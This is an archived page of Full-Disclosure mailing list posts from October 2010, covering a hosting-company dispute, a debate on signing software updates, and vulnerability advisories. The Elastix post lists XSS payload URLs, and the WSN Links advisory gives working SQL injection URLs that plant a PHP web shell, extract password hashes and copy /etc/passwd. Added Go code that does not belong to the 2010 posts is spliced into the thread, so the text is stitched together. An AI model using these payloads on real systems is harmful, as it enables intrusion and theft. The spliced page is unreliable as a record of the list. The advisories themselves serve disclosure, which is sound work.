[Full-disclosure] Fw: hostgator

2010-10-31 Thread Josey Yelsef
Hi Brent,

I'm doing good too, thanks.

Sorry for the delay. You own a multi-million dollar hosting business and your 
mail hit my spam box.

Making Good Money With HostGator. 2010-10-30. 
http://www.blackhatworld.com/blackhat-seo/making-money/176979-making-good-money-hostgator.html
http://bit.ly/9pT1G4 Accessed: 2010-10-30. (Archived by WebCite® at 
http://www.webcitation.org/5ts7nfD9b)

Let's say these sponsored conversations mentioned are not created by your 
management or company and are all in fact affiliates: just because they are 
affiliates doesn't make you less culpable for the noise your business causes. 
You are allowing the net with garbage and puff pieces posing as authentic 
reviews of your business.

You run a hub for affiliate link spam. Your business is a call center filled 
with monkeys paid at minimum wage where you cram clients into ungodly spaces on 
ancient web 1.0 software.

How is this different from spamming porn or viagra? The only difference is it's 
crappy hosting.

You haven't denied your online advertising budget on Google not being 7 figs. 
While mentioning affiliates, you did not deny you didn't market yourself, only 
denied the subjective term Google bombing. I am not quickly seeing you're 
not Google bombing.

You're not the only company guilty of this, you're right that the other garbage 
web hosts like 1and1, bluehost, etc. play similar games. Look, McDonald's 
gets clients, Walmart gets clients, but they rely on cost, product and 
dependability, while your type is cram n' cruft.

I am working on a new exposé on a penny auction site scheme that uses similar 
marketing techniques called quibids (and their copycats). Will expose mass-sock 
puppetry and of course fraud. Should be ready next week.

--- On Sat, 10/30/10, br...@hostgator.com br...@hostgator.com wrote:

 From: br...@hostgator.com br...@hostgator.com
 Subject: hostgator
 To: hg_expo...@yahoo.com
 Date: Saturday, October 30, 2010, 4:59 AM
 Hi Joey,
 
 
 I just read 
 http://seclists.org/fulldisclosure/2010/Oct/466?utm_source=twitterfeedutm_medium=twitter
 
 
 We have over 400,000 customers with the majority of them
 being extremely happy with us. I'd be happy to send you over
 our net promoter score if you're familiar with this and
 interested to prove this.
 
 
 It is true that we have many ex employees that aren't happy
 with us, as well as many current. We let our customers
 decide who we terminate, who gets raises, as well as who
 gets promotions based on customer ratings.
 
 We have about 450 employees currently. In the last year
 alone we've had to fire somewhere around 250 employees. We
 lost about another 20 to other companies as well as people
 moving for personal reasons. I could find out exact numbers
 on this if you are interested.
 
 Employees who are rated well by our customers are usually
 very happy with us, employees who are rated poorly usually
 aren't as we actively document their write ups until they
 either improve or we are forced to terminate them. A lot of
 what you documented is true as well as much of it being
 completely false.
 
 We have never google bombed. What you are seeing are many
 affiliate sites that are created by our 10,000+ affiliates.
 Many of them are hosted with us and very happy with our
 services. There are also many that are just trying to make a
 sale and have never used our services. I'd say a good
 portion of this group push us as well as our major
 competitors that have an affiliate program. If you do a
 little more research you will quickly find that hostgator
 does not participate in google bombing.
 
 All in all your review seems to be nothing more than a smear
 campaign. It would be nice if you gave us a fair review by
 actually testing our service; after all, wouldn't that be
 truly exposing us?
 
 
 
 
 -- 
 
 Sincerely,
 
 
 Brent Oxley
 Owner and Founder
 HostGator.com, LLC





  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-10-31 Thread Mario Vilas
Just signing the update packages prevents this attack, so it's not that hard
to fix.

On Sat, Oct 30, 2010 at 5:02 PM, valdis.kletni...@vt.edu wrote:

 On Sat, 30 Oct 2010 04:43:14 +0800, Jacky Jack said:
  It's now a time for vendors to re-consider their updating scheme.

 And do what differently, exactly?

 OK, so it's *possible* to fake out the iTunes update process.  But which is
 easier and more productive:

 A) Laying in wait for some random to think "Wow, I should update iTunes" and
 hijack the process.

 B) Send out a few hundred thousand spam with a 'From: upd...@apple-itunes-support.com'
 with a link to a site you control and feed the sheep some malware.

 Evilgrade looks like a nice tool to have if you're doing a pen test or a
 targeted attack and can somehow get the victim to do an update (possibly social
 engineering), but for any software vendor feeding software updates to Joe
 Sixpack this threat model is *so* far down the list it isn't funny.  Simply
 compare the number of boxes pwned by (A) and (B) - how many people have gotten
 pwned because somebody hijacked their update from Symantec or wherever,
 compared to the number pwned because they got a popup that said "Your computer
 is infected, click here to fix it"?

 Remember - just because a new tool useful for an attacker shows up, does *not*
 mean it's a game changer for the industry at large.






-- 
HONEY: I want to… put some powder on my nose.
GEORGE: Martha, won’t you show her where we keep the euphemism?

[Full-disclosure] Call for Associate Editors and reviewers: Advances in Network and Communications

2010-10-31 Thread Alejandro Canovas

 Call for Associate Editors and reviewers 

Advances in Network and Communications

ISSN: 2093-4734

http://www.humanpub.org/anc/index.html

Advances in Network and Communications is an online international journal, 
published by Human and Sciences Publication (HumanPub). All papers published in 
this journal will be permanently available online without charge. 

Advances in Network and Communications is published two times in a year. The 
goal of the ANC is to publish peer reviewed original research result-oriented, 
practical, theoretical, survey, review, tutorial papers in the various fields 
of Network and Communications. 

High quality submissions that advance the research and that contribute 
something new to the literature on Computing & Information Technology and 
Telecommunications are encouraged. The special focus of the ANC forum is to 
publish path-breaking applications and applied research results in the network 
and communication areas.

Topics such as Security and cryptographic algorithms communication, QoS, Ad-Hoc 
and Sensor networks, P2P, CDNs, Wireless Networks, Mobile and Dynamic Networks, 
Mesh networks, VoIP, IPTV, Cognitive Radio Networks, Optical networks, Green 
Computing networks, Power Efficient and Energy Saving Networks, 
Distributed/Decentralized Networks are covered (but not limited to) in this 
journal.

You are welcome to send this call for Associate Editors and reviewers to the 
mailing lists you belong to and any people working in Network and 
Communications that may be interested in working on the dissemination of the 
research papers in this area.

You can submit your short CV to the editor in chief (jllo...@dcom.upv.es), 
ask for any information, or send your suggestions.

Alejandro Cánovas Solbes 
Assistant of the Journal Advances in Network and Communications
Polytechnic University of Valencia, Spain


Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-10-31 Thread Christian Sciberras
Only thing, there's the danger of someone using stolen certificates.
But I'm sure there's another fix for that.

In my opinion, all in all, you're creating yet another overly complex
system with yet more possible flaws.
Don't forget that each new line of code is a potential attack vector which
affects any system.

Just my 2 cents...

Chris.




Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-10-31 Thread Valdis . Kletnieks
On Sun, 31 Oct 2010 13:09:27 BST, Mario Vilas said:

 Just signing the update packages prevents this attack, so it's not that hard
 to fix.

Except if a signing key gets compromised, as happened to one Linux vendor
recently, causing a lot of kerfuffle...  Setting up a proper signing system
involves a certain amount of actual cost and effort.  And every organization
that produces code, be it for-profit proprietary code or free open-source code,
has to make resource tradeoffs.

Is there any actual *evidence* that hijacking authorized updates is a big
enough problem to be worth it?  If each year, 5 of their customers get pwned
by the sort of attack that Evilgrade does, but 50,000 get pwned by "click here"
popups that code signing won't do squat to prevent, is it really worth their
time and effort?  Sure, sucks to be one of the 5, but if they instead spend the
resources to do something *else* to make their customers' lives better that
would benefit thousands rather than the 5



Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-10-31 Thread Valdis . Kletnieks
On Sun, 31 Oct 2010 14:24:59 BST, Christian Sciberras said:

 In my opinion, all in all, you're creating yet another overly complex
 system with yet more possible flaws.
 Don't forget that each new line of code is a potential attack vector which
 affects any system.

Amen to that.

A more subtle issue is the tradeoff issue:  Any time they have a code engineer
spending time building and feeding that code-signing infrastructure is time that
code engineer *isn't* spending writing actual new features the users *want*.

Which user-requested feature are you going to heave over the side in order to
do code-signing instead?  That question has to enter into the calculus as well.



Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-10-31 Thread [lesh] Ivan Nikolic
Hm, I'm new to this list, so I find this a bit strange.

Christian, Valdis, are you the same person?
what are your motives?
do you really believe the things you are saying? 
you seem to be just generally negative, jumping from point to point and being 
very silly.

Just signing the update packages prevents this attack, so it's not that hard 
to fix.

  In my opinion, all in all, you're creating yet another overly complex
  system with yet more possible flaws.
  Don't forget that each new line of code is a potential attack vector which
  affects any system.

there is a REAL attack vector that needs to be fixed, and you are saying that 
it shouldn't be fixed as every 
line of code creates a POTENTIAL attack vector?

 Only thing, there's the danger of someone using stolen certificates.

a signing key might be stolen, so we shouldn't use it?
do you use passwords chris? why? they might be stolen?
you can't possibly believe that?

 Amen to that.
 
 A more subtle issue is the tradeoff issue:  Any time they have a code engineer
 spending time building and feeding that code-signing infrastructure is time 
 that
 code engineer *isn't* spending writing actual new features the users *want*.

code-signing infrastructure? of course, code for those things is well known, 
packed in libraries, and trivial to use. of course. and...
and bla.
I could go on, but probably the whole list is aware of those things.

I'm wondering what's going on?
are you paid list-posters from an evil rival company? this is the only idea I 
have.



-- 
PGP 0x96085C00 http://lesh.sysphere.org



[Full-disclosure] Fwd: xss in elastix

2010-10-31 Thread dave b
Oh look, I think bugtraq hates me.
more lame xss in yet another voip management user interface for asterisk...

-- Forwarded message --
From: dave b db.pub.m...@gmail.com
Date: 29 October 2010 03:36
Subject: xss in elastix
To: bugt...@securityfocus.com


xss in elastix (http://www.elastix.org/),

1. https://10.0.20.226/index.php?menu=packagesnombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3EsubmitInstalado=installedsubmit_nombre=Search
2. https://10.0.20.226/?menu=pbxconfigdisplay=recordingsSubmit=Godisplay=recordingsusersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
3. https://10.0.20.226/index.php?menu=cdrreportdate_end=28%20Oct%202010date_start=28%20Oct%202010field_name=dstfield_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3Efilter=Filterstatus=ALL
4. https://10.0.20.226/index.php?menu=asterisk_logfilter=2010-10-28offset=0busqueda=ultima_busqueda=ultimo_offset=busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3Efilter=2010-10-28offset=0show=Showultima_busqueda=ultimo_offset=
5. https://10.0.20.226/index.php?menu=summary_by_extensionoption_fil=value_fil=date_from=28date_from=28%20Oct%202010date_to=28%20Oct%202010option_fil=Extshow=Showvalue_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
6. https://10.0.20.226/index.php?menu=grouplistaction=viewid=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
7. https://10.0.20.226/index.php?menu=group_permissionfilter_group=1filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E



[Full-disclosure] [DEMO] Sample videos about IDS/IPS evasions...

2010-10-31 Thread Nelson Brito
Hi, everyone!

As so many highlights have been given on Intrusion Detection System and
Intrusion Prevention System evasions (?) last week, I decided to send this
message just to let you all know that I published a brand-new sample video,
demonstrating two Exploit Next Generation® example modules, successfully
evading:

* SNORT 2.8.6 detection for MS02-056 vulnerability.

* SURICATA 0.9.0 detection for MS08-078 vulnerability.

Here is the YouTube video:

* http://www.youtube.com/watch?v=iHgtf4PXqeU

PS: So, Intrusion Detection System and Intrusion Prevention System evasions
are not that BIG NEWS, at least not for the H2HC Sixth Edition's audience.

Before someone asks what the similarities and/or differences between Exploit
Next Generation® (ENG++) and Advanced Evasion Techniques (AET) are, let me get
this clear:

* ENG++ has a different approach and has no similarity to AET,
despite the fact that both of them can be used to bypass IDS and IPS
technology. Besides, ENG++ is much older research.

* ENG++ was first designed in 2004, coded in 2005, published in 2008
( http://packetstormsecurity.org/papers/general/ENG_in_a_nutshell.pdf
Exploit creation - The random approach or Playing with random to build
exploits), and became a methodology in 2009 (
http://www.h2hc.com.br/repositorio/2009/files/Nelson.en.pdf The Departed:
Exploit Next Generation - The Philosophy).

* ENG++ became a methodology when I decided to port it to work
with/to any open exploit development framework, i.e., Metasploit Framework.

* Ported means that ENG++ has been developed for a long, long, long
time, so only some modules are working on Metasploit Framework, to release
some of its examples and to help people understand that really cool stuff
can be done when you are innovating and creating.

In a few words: Exploit Next Generation® Compliance Methodology is not the
same thing as Advanced Evasion Techniques (ENG++ != AET).

For further information, please visit the URL:

* http://j.mp/ExploitNG

For online information and news about Exploit Next Generation® Compliance
Methodology, please follow @Exploit_NG (http://twitter.com/Exploit_NG) on
Twitter.

Cheers.

Nelson Brito

Security Researcher

http://fnstenv.blogspot.com/


[Full-disclosure] 'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)

2010-10-31 Thread Mark Stanislav
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in the search.php code that allows for SQL injection of 
various parameters. By assembling portions of SQL code between the affected 
parameters, successful SQL injection into the software can occur. In the 
testing done, various 'UNION SELECT' SQL injections can occur. 

 
II. AFFECTED VERSIONS
---
 6.0.1;  5.1.51 ;  5.0.81


III. TESTED VERSIONS
---
5.1.40  5.1.49


IV. PoC EXPLOITS 
---
1) A 'UNION SELECT' which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20?php%20system($_REQUEST[cmd]);%20?%20INTO%20OUTFILEnamesearch=/var/www/exec.phpaction=filterfilled=1whichtype=categories

2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail 
to be extracted to a file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILEnamesearch=/var/www/pass.txtaction=filterfilled=1whichtype=categories

3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web 
directory file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILEnamesearch=/var/www/passwd.txtaction=filterfilled=1whichtype=categories


V. NOTES 
---
* The above exploits require the 'FILE' SQL privilege as well as poor web directory 
permissions to work. 
* Only 'namecondition' and 'namesearch' are utilized for the actual SQL 
injection.
* There is potential to exploit this vulnerability in a way that outputs user data 
directly to the browser.
* Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN 
Links' deployments.


VI. SOLUTION
---
Upgrade to the most recent version of your 'WSN Links' code branch.


VII. REFERENCES
---
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/

VIII. TIMELINE
---
10/10/2010: Initial disclosure e-mail to the vendor
10/18/2010: Follow-up via the vendor's contact web form
10/18/2010: Vendor acknowledgement/commitment to fix
10/21/2010: Patched versions released
10/31/2010: Public disclosure
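The advisory names the pattern (a free-form 'namecondition' pasted into the WHERE clause, with 'namesearch' quoted after it) but not the fix. The following is an added Go example, not WSN Links' code or the advisory's: a constructed model of that assembly beside a whitelisted, parameter-bound version, plus a scan of constructed access-log lines for requests shaped like the PoC URLs. The table, column and operator token names are assumptions.

```go
package main

import (
	"errors"
	"net/url"
	"strings"
)

// VulnerableSearchSQL is a constructed model of the flaw, not WSN Links' code:
// the condition is pasted into the WHERE clause and the search term is quoted
// by hand, so a condition ending in "INTO OUTFILE" turns the hand-quoted
// search term into the output path, which is the shape of the PoC URLs above.
func VulnerableSearchSQL(nameCondition, nameSearch string) string {
	return "SELECT name, url FROM wsnlinks_links WHERE ((name " +
		nameCondition + " '" + nameSearch + "'))"
}

// Hardened form: the condition parameter is an opaque token mapped to a fixed
// SQL fragment, and the search term only ever travels as a bound parameter.
var conditionSQL = map[string]struct {
	frag      string
	takesTerm bool
}{
	"equals":    {"name = ?", true},
	"like":      {"name LIKE ?", true},
	"isnull":    {"name IS NULL", false},
	"isnotnull": {"name IS NOT NULL", false},
}

var ErrBadCondition = errors.New("namecondition is not an allowed operator")

// SafeSearchSQL returns the statement and its arguments for database/sql's
// QueryContext; anything outside the whitelist is refused before it nears the DB.
func SafeSearchSQL(nameCondition, nameSearch string) (string, []interface{}, error) {
	c, ok := conditionSQL[strings.ToLower(nameCondition)]
	if !ok {
		return "", nil, ErrBadCondition
	}
	q := "SELECT name, url FROM wsnlinks_links WHERE (" + c.frag + ")"
	if !c.takesTerm {
		return q, nil, nil
	}
	return q, []interface{}{nameSearch}, nil
}

// FlagSearchAbuse is the detection side: it scans common-log-format lines for
// search.php requests whose decoded namecondition carries SQL syntax instead of
// an operator name. The marker list is a coarse heuristic for this advisory's
// pattern, not a general injection detector.
func FlagSearchAbuse(logLines []string) []string {
	var hits []string
	for _, line := range logLines {
		parts := strings.Split(line, "\"")
		if len(parts) < 2 {
			continue
		}
		req := strings.Fields(parts[1]) // METHOD PATH PROTOCOL
		if len(req) < 2 || !strings.HasPrefix(req[1], "/search.php?") {
			continue
		}
		u, err := url.Parse(req[1])
		if err != nil {
			continue
		}
		cond := strings.ToLower(u.Query().Get("namecondition"))
		for _, marker := range []string{")", "union", "select", "outfile"} {
			if strings.Contains(cond, marker) {
				hits = append(hits, strings.Fields(line)[0]+" "+cond)
				break
			}
		}
	}
	return hits
}

// SampleLog holds constructed access-log lines; the first mirrors the PoC shape
// with a harmless SELECT 1 in place of the advisory's payload.
var SampleLog = []string{
	`203.0.113.7 - - [31/Oct/2010:10:00:01 +0000] "GET /search.php?namecondition=IS%20NOT%20NULL%29%29%20UNION%20%28%28SELECT%201%20INTO%20OUTFILE&namesearch=%2Fvar%2Fwww%2Fx.txt&action=filter HTTP/1.1" 200 512`,
	`198.51.100.3 - - [31/Oct/2010:10:00:05 +0000] "GET /search.php?namecondition=like&namesearch=golang&action=filter HTTP/1.1" 200 2048`,
	`198.51.100.3 - - [31/Oct/2010:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 1024`,
}
```

With the whitelist in place the advisory's 'debug=1' and 'FILE' privilege notes still matter for defence in depth, but the UNION can no longer be assembled from the two parameters at all.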


Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-10-31 Thread Christian Sciberras
 Christian, Valdis, are you the same person?

[sarcasm] Yes we are, it's a personality disorder issue. ;-) [/sarcasm]

 what are your motives?

What would one's motive be in a discussion?

 do you really believe the things you are saying?

[sarcasm] No, I was just trying to sound cool going against most FD readers
out there. [/sarcasm]

 you seem to be just generally negative, jumping from point to point and
being very silly.

Negative? Is asking a change in the standards saves us religion, being
negative?
What seems silly to you might be sane and true to the rest of the world.
Oh and, maybe you're overly meditative to see several points in my
post... let me confess something:
there was only ONE point.

 there is a REAL attack vector that needs to be fixed, and you are saying
that it shouldn't be fixed as every
 line of code creates a POTENTIAL attack vector?

Remember stuxnet? and its use of stolen certificates?

 a signing key might be stolen, so we shouldn't use it?

I've never said it's not.

 do you use passwords chris? why? they might be stolen?

Yes, I do. Ever heard of hacking/stealing an account?

 you can't possibly believe that?

Uhm, yes I do.

 I'm wondering what's going on?
 are you payed list-posters from an evil rival company? this is the only
idea I have.

Wow, so daft. Is someone on this damned list entitled to an opinion or a
fair discussion?
As to your theory, one question, which rival company (to those companies)?



I think that you're mostly confused as to what the point is. There are
places where code
should be signed and there are places where it shouldn't.
Evilgrade did reveal that some of these places aren't as they should, but
this does not
mean any and all sorts of updates should be signed.

The trade-off Valdis mentioned is one of my main deterrents to creating such an
updating system; why would I hand out the money for code signing when the ROI
doesn't even cover it??

One thing you ought to think on: why don't user-based sites ask for a PGP
signature?
Why do they use a simple password mechanism (if at all)?


PS: Keep up with the conspiracy theories, got to love 'em.


Cheers,
Chris.






[Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-10-31 Thread YGN Ethical Hacker Group
1. VULNERABILITY DESCRIPTION


Potential SQL Injection Flaws were detected in Joomla! CMS version
1.5.20. These flaws were reported along with our Cross-Site Scripting Flaw
which was fixed in 1.5.21. Developers believed that our reported SQL
Injection flaws are not fully exploitable because of Joomla! built-in
string filters, and they were not fixed in 1.5.21, which is currently the
latest version.

As a result, we disclosed these flaws in order for someone who can
exploit these flaws to the next maximum level.


2. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg


3. DISCLOSURE TIME-LINE


2010-10-06  : Notified Joomla! Security Strike Team
2010-11-01  : Vulnerability disclosed


4. VENDOR

Joomla! Developer Team
http://www.joomla.org
http://www.joomla.org/download.html



# YGN Ethical Hacker Group
# http://yehg.net
# 2010-11-1


Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-10-31 Thread Jacky Jack
 It's now a time for vendors to re-consider their updating scheme.

 And do what differently, exactly?


To name a few, developers can do code signing, SSL certificate
verification like our favorite Firefox, and the methods used by AV vendors.
There have been cheap/free SSL certificate vendors like startssl.
This task should/would not be a huge pain. It's that simple.

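The three positions in this thread (sign the packages; a signing key can leak, as Valdis notes; signing alone is not the whole job) fit in one small client-side check. This is an added Go example, not Evilgrade's, any poster's or any vendor's code; the manifest format, key ids and product name are constructed for the illustration.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
)

// Manifest is the document the vendor signs (a constructed format, not any real updater's).
type Manifest struct {
	Product string `json:"product"`
	Version int    `json:"version"` // build number, must only ever increase
	SHA256  string `json:"sha256"`  // hex digest of the package bytes
	KeyID   string `json:"key_id"`  // which vendor key signed this manifest
}

// SignedUpdate is what the client fetches over an untrusted channel.
type SignedUpdate struct {
	Manifest  []byte // JSON of Manifest, exactly the bytes that were signed
	Signature []byte // Ed25519 signature over Manifest
	Package   []byte
}

// TrustStore is client-side state that ships with the installer, never with an update.
type TrustStore struct {
	Keys      map[string]ed25519.PublicKey // key id -> vendor public key
	Revoked   map[string]bool              // key ids known to be compromised
	Product   string
	Installed int // version currently installed
}

var (
	ErrUntrustedKey = errors.New("manifest signed by an unknown or revoked key")
	ErrBadSignature = errors.New("manifest signature does not verify")
	ErrWrongProduct = errors.New("manifest is for a different product")
	ErrRollback     = errors.New("manifest version is not newer than installed")
	ErrDigest       = errors.New("package digest does not match manifest")
)

// Sign is the vendor side: bind the package digest into the manifest, then sign it.
func Sign(priv ed25519.PrivateKey, m Manifest, pkg []byte) (SignedUpdate, error) {
	sum := sha256.Sum256(pkg)
	m.SHA256 = hex.EncodeToString(sum[:])
	b, err := json.Marshal(m)
	if err != nil {
		return SignedUpdate{}, err
	}
	return SignedUpdate{Manifest: b, Signature: ed25519.Sign(priv, b), Package: pkg}, nil
}

// Verify is the client side; KeyID is read from the unverified manifest only to choose a key.
func (t *TrustStore) Verify(u SignedUpdate) (*Manifest, error) {
	var m Manifest
	if err := json.Unmarshal(u.Manifest, &m); err != nil {
		return nil, err
	}
	pk, ok := t.Keys[m.KeyID]
	sum := sha256.Sum256(u.Package)
	switch {
	case !ok || t.Revoked[m.KeyID]:
		return nil, ErrUntrustedKey
	case !ed25519.Verify(pk, u.Manifest, u.Signature):
		return nil, ErrBadSignature
	case m.Product != t.Product:
		return nil, ErrWrongProduct
	case m.Version <= t.Installed: // stops replay of an older, genuinely signed release
		return nil, ErrRollback
	case hex.EncodeToString(sum[:]) != m.SHA256:
		return nil, ErrDigest
	}
	return &m, nil
}

// Scenario signs one legitimate release, then plays the moves open to someone in
// the update path: swap the package bytes, replay an older signed release, and
// sign with a key the vendor has revoked. It returns Verify's verdict for each.
func Scenario() (legit, tampered, replayed, revoked error) {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	oldPub, oldPriv, _ := ed25519.GenerateKey(rand.Reader)
	ts := &TrustStore{
		Keys:      map[string]ed25519.PublicKey{"k1": oldPub, "k2": pub},
		Revoked:   map[string]bool{"k1": true}, // k1 leaked; the vendor rotated to k2
		Product:   "demoapp",
		Installed: 41,
	}
	good, _ := Sign(priv, Manifest{Product: "demoapp", Version: 42, KeyID: "k2"}, []byte("release 42"))
	_, legit = ts.Verify(good)
	evil := good
	evil.Package = []byte("trojaned build") // manifest and signature left untouched
	_, tampered = ts.Verify(evil)
	old, _ := Sign(priv, Manifest{Product: "demoapp", Version: 40, KeyID: "k2"}, []byte("release 40"))
	_, replayed = ts.Verify(old)
	leaked, _ := Sign(oldPriv, Manifest{Product: "demoapp", Version: 43, KeyID: "k1"}, []byte("release 43"))
	_, revoked = ts.Verify(leaked)
	return
}
```

The revocation list is the part that answers Valdis's point: it only helps if the client can learn about a leaked key through some channel the leaked key cannot forge, which is the operational cost he is describing.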


Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-10-31 Thread Thor (Hammer of God)
According to your site, you want to entice young Burmese people into ethical 
hacking and raise students' interest in security/hacking in an ethical 
manner, yet you disclosed these flaws in order for someone who can exploit 
these flaws to the next maximum level? 

Douche. 

t



-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical 
Hacker Group
Sent: Sunday, October 31, 2010 12:19 PM
To: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com; 
b...@securitytracker.com; v...@secunia.com; secal...@securityreason.com; 
n...@securiteam.com; v...@security.nnov.ru
Subject: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

1. VULNERABILITY DESCRIPTION


Potential SQL Injection Flaws were detected Joomla! CMS version 1.5.20. These 
flaws were reported along with our Cross Scripting Flaw which was fixed in 
1.5.21. Developers believed that our reported SQL Injection flaws are not fully 
exploitable because of Joomla! built-in string filters and were not fixed in 
1.5.21 which is currently the latest version.

As a result, we disclosed these flaws  in order for someone who can exploit 
these flaws to the next maximum level.


2. PROOF-OF-CONCEPT/EXPLOIT

http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_front.jpg
http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_%28filter_order_Dir%29_back.jpg


3. DISCLOSURE TIME-LINE


2010-10-06  : Notified Joomla! Security Strike Team
2010-11-01  : Vulnerability disclosed


4. VENDOR

Joomla! Developer Team
http://www.joomla.org
http://www.joomla.org/download.html



# YGN Ethical Hacker Group
# http://yehg.net
# 2010-11-1

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-10-31 Thread Thor (Hammer of God)
P.S.  You don't sanitize input on your Subscribe for Updates post before 
sending it to Feedburner.   You know, the one located in 
http://yehg.net/lab/#home; across from your XSS attack demo on Joomla! log 
update.  
It's trivial to generate Trouble at the mill! FeedBurner encountered some kind 
of error performing the task or displaying the page you requested. Fear not, 
this event has notified the appropriate people within FeedBurner and we will 
have this all ironed out soon.

I'm  sure there are people on the list here that can help you with that.

t




Re: [Full-disclosure] Joomla 1.5.21 | Potential SQL Injection Flaws

2010-10-31 Thread YGN Ethical Hacker Group
To clarify, we want excellent guys here to prove/bypass/exploit the
potential issues to force developers to fix them rather than hiding these
issues. That's what we want to say.



[Full-disclosure] Fwd: [DEMO] Sample videos about IDS/IPS evasions...

2010-10-31 Thread Jacky Jack
-- Forwarded message --
From: Nelson Brito nbr...@sekure.org
Date: Mon, Nov 1, 2010 at 5:40 AM
Subject: RE: [Full-disclosure] [DEMO] Sample videos about IDS/IPS evasions...
To: Jacky Jack jacksonsmth...@gmail.com


http://vimeo.com/16371447

Use this instead!!!

 -Original Message-
 From: Jacky Jack [mailto:jacksonsmth...@gmail.com]
 Sent: Sunday, October 31, 2010 5:43 PM
 To: Nelson Brito
 Subject: Re: [Full-disclosure] [DEMO] Sample videos about IDS/IPS evasions...

 This video has been removed as a violation of YouTube's policy against
 spam, scams, and commercially deceptive content.



 On Sat, Oct 30, 2010 at 4:47 AM, Nelson Brito nbr...@sekure.org wrote:
  Hi, everyone!
 
  As so many highlights have been given on Intrusion Detection System and
  Intrusion Prevention System evasions (?) last week, I decided to send this
  message just to let you all know that I published a brand-new sample video,
  demonstrating two Exploit Next Generation® example modules, successfully
  evading:
 
  · SNORT 2.8.6 detection for MS02-056 vulnerability.
  · SURICATA 0.9.0 detection for MS08-078 vulnerability.
 
  Here is the YouTube video:
  · http://www.youtube.com/watch?v=iHgtf4PXqeU
 
  PS: So, Intrusion Detection System and Intrusion Prevention System evasions
  are not that BIG NEWS, at least not for the H2HC Sixth Edition's audience.
 
  Before someone asks what the similarities and/or differences between Exploit
  Next Generation® (ENG++) and Advanced Evasion Techniques (AET) are, let me
  get this clear:
 
  · ENG++ has a different approach and has no similarity to AET, despite the
  fact that both of them can be used to bypass IDS and IPS technology. Besides,
  ENG++ is much older research.
  · ENG++ was first designed in 2004, coded in 2005, published in 2008 (“Exploit
  creation - The random approach” or “Playing with random to build exploits”),
  and became a methodology in 2009 (“The Departed: Exploit Next Generation – The
  Philosophy”).
  · ENG++ became a methodology when I decided to port it to work with/to any
  open exploit development framework, i.e., Metasploit Framework.
  · Ported means that ENG++ has been developed for a long, long, long time, so
  just some modules are working on Metasploit Framework to release some of its
  examples and to help people understand that really cool stuff can be done
  when you are innovating and creating.
 
  In a few words: Exploit Next Generation® Compliance Methodology is not the
  same thing as Advanced Evasion Techniques (ENG++ != AET).
 
  For further information, please, visit the URL:
  · http://j.mp/ExploitNG
 
  For online information and news about Exploit Next Generation® Compliance
  Methodology, please, follow @Exploit_NG on Twitter.
 
  Cheers.
 
  Nelson Brito
  Security Researcher
  http://fnstenv.blogspot.com/
 


Re: [Full-disclosure] Evilgrade 2.0 - the update explotation framework is back

2010-10-31 Thread Tim
Valdis,

I've read all of your postings on this thread and I just don't buy
what you're saying.


 Except if a signing key gets compromised, as happened to one Linux vendor
 recently, causing a lot of kerfluffle...  Setting up a proper signing system
